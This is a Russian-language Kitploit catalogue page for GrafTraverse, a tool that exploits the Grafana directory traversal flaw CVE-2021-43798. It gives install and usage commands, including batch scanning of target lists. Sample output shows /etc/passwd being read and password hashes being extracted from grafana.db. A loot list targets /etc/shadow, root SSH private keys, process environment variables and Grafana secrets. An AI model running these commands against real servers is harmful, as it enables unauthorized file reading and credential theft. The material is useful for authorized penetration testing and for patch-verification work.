Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/asbawy/graftraverse-cve-2021-43798
Взлом паролейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеRed Teaming
GitHubasbawy/graftraverse-cve-2021-43798

GrafTraverse-CVE-2021-43798

CVE-2021-43798 MiNi Exploitation Framework

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GrafTraverse - Мини-фреймворк эксплуатации CVE-2021-43798

Инструмент автоматизации командной строки для авторизованного тестирования безопасности уязвимости обхода каталогов Grafana (CVE-2021-43798).


Обзор

Banner

CVE-2021-43798 — это неаутентифицированная уязвимость обхода каталогов в Grafana 8.x, которая позволяет злоумышленникам читать произвольные файлы в файловой системе через конечную точку /public/plugins/. Основная причина — некорректная санитизация пути при запросах ресурсов плагинов, что позволяет последовательностям ../ выйти за пределы целевого каталога.

GrafTraverse — это полная переработка оригинального proof-of-concept. Он исправляет критически важные ошибки обработки запросов, добавляет многопоточное пакетное сканирование, автоматическое обнаружение плагинов, извлечение учётных данных и структурированную отчётность, что делает его инструментом производственного уровня для групп красных команд и пентестеров.


Возможности


Установка

root@kitploit:~
# Clone the repository
git clone https://github.com/asbawy/GrafTraverse.git
cd GrafTraverse

# Ensure requests is available (it ships with Kali)
pip3 install requests

# Make executable
chmod +x GrafTraverse.py

Использование

GrafTraverse использует CLI на основе подкоманд. Все команды поддерживают --help.

1. Интерактивная одиночная цель

Запуск интерактивного меню для одной цели:

root@kitploit:~
python3 GrafTraverse.py single -u http://IP:PORT
root@kitploit:~
============================================================
 INTERACTIVE MODE
============================================================
 1. /etc/passwd
 2. grafana.ini
 3. grafana.db
 4. Custom path
 5. Full automated loot
 6. Scan plugins
 7. Exit
============================================================

2. Сканирование плагинов

Быстрое определение уязвимой конечной точки плагина без эксплуатации:

root@kitploit:~
python3 GrafTraverse.py scan -u http://target:PORT

3. Пакетное сканирование

Загрузка целей из файла и их одновременная обработка:

root@kitploit:~
python3 GrafTraverse.py batch -l targets.txt --workers 10 --csv results.csv

Формат targets.txt:

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000
https://grafana.target.com
# Lines starting with # are ignored

4. Перебор по списку слов

Подача пользовательского списка файлов для глубокого обхода:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --wordlist sensitive_files.txt   --output-dir ./loot   --json log.json

5. Прокси и пользовательские заголовки

Маршрутизация через Burp Suite и добавление пользовательских заголовков:

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --proxy http://127.0.0.1:8080   -H "X-Forwarded-For: 127.0.0.1"   -H "Authorization: Bearer eyJ0..."

Справочник команд

single

batch

ФлагОписание
-l, --listФайл с URL целей (обязательно)
--workersОдновременные потоки (по умолчанию: 5)
(поддерживаются все флаги single)

scan

ФлагОписание
-u, --urlURL цели (обязательно)
(поддерживаются все сетевые флаги)

Пример вывода

Успешное получение файла

root@kitploit:~
[+] Output: 20260526_GrafTraverse
[*] Testing: /etc/passwd (via alertlist)
[+] SUCCESS: /etc/passwd (1874 bytes)

------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
------------------------------------------------------------

[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_passwd

Извлечение хэша из базы данных Grafana

root@kitploit:~
[*] Testing: /var/lib/grafana/grafana.db (via alertlist)
[+] SUCCESS: /var/lib/grafana/grafana.db (98304 bytes)
[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_grafana.db
[*] Extracted 3 password hashes:
    admin:PBKDF2$sha256$10000$...base64...
    editor:PBKDF2$sha256$10000$...base64...
    viewer:PBKDF2$sha256$10000$...base64...

Целевые файлы (автоматическая добыча)

Встроенная последовательность добычи пытается получить следующие файлы по порядку:


Уязвимые версии

  • Grafana с 8.0.0 по 8.3.0
  • Исправлено в 8.3.1 и 7.5.12
Скачать инструмент
ФункцияОписание
Многоплагинный брутфорсАвтоматически проверяет 40+ встроенных плагинов для поиска уязвимого пути
Интерактивный режимЭксплуатация одной цели с управлением через меню и предпросмотром файлов в реальном времени
Пакетный режимОдновременное сканирование нескольких целей с настраиваемым количеством потоков
Режим со списком словГлубокая перебор файлов с использованием пользовательских списков слов
Автоматическое извлечение хэшейАвтоматически извлекает хэши паролей PBKDF2 из загруженного grafana.db
Структурированное логированиеЭкспорт результатов в JSON и CSV для удобного составления отчётов
Поддержка проксиМаршрутизация трафика через Burp, ZAP или любой HTTP-прокси (--proxy)
Пользовательские заголовкиВнедрение произвольных заголовков для обхода WAF или токенов аутентификации (-H)
Настройка обходаПереопределение глубины обхода по умолчанию для нестандартных сред (--depth)
Умная фильтрацияУстраняет ложные срабатывания, отвергая ответы JS/CSS/HTML плагинов
Нулевые зависимостиТребуется только requests (предустановлен на Kali / Parrot)
ФлагОписание
-u, --urlURL цели (обязательно)
--no-downloadРежим только просмотра, не сохранять файлы
-t, --timeoutТайм-аут запроса в секундах (по умолчанию: 10)
--proxyURL HTTP/HTTPS прокси
-H, --headerПользовательский заголовок (повторяемый)
--depthСтрока обхода (по умолчанию: ../../../../../../../../)
--output-dirДиректория для сохранения полученных файлов
--jsonДобавить результаты в JSON-файл журнала
--csvДобавить результаты в CSV-файл журнала
--wordlistФайл с путями для перебора
--pluginПринудительное указание имени плагина
ФайлТипЧувствительность
/etc/passwdТекстПеречисление пользователей
/etc/shadowТекстХэши паролей (редко читаемы)
/etc/hostsТекстТопология сети
/etc/hostnameТекстИдентификация хоста
/etc/grafana/grafana.iniТекстСекреты Grafana и учётные данные БД
/var/lib/grafana/grafana.dbДвоичныйБаза данных SQLite с хэшами пользователей и ключами API
/var/log/grafana/grafana.logТекстОперативная информация
/root/.ssh/id_rsaТекстПриватный ключ SSH
/root/.ssh/authorized_keysТекстКарта доступа по ключам
/proc/self/environТекстПеременные окружения процесса
/proc/self/cmdlineТекстАргументы процесса
/proc/versionТекстВерсия ядра
/proc/mountsТекстСтруктура файловой системы
/etc/os-releaseТекстИдентификация ОС
/etc/issueТекстИдентификация ОС
/etc/crontabТекстЗапланированные задачи
/etc/resolv.confТекстКонфигурация DNS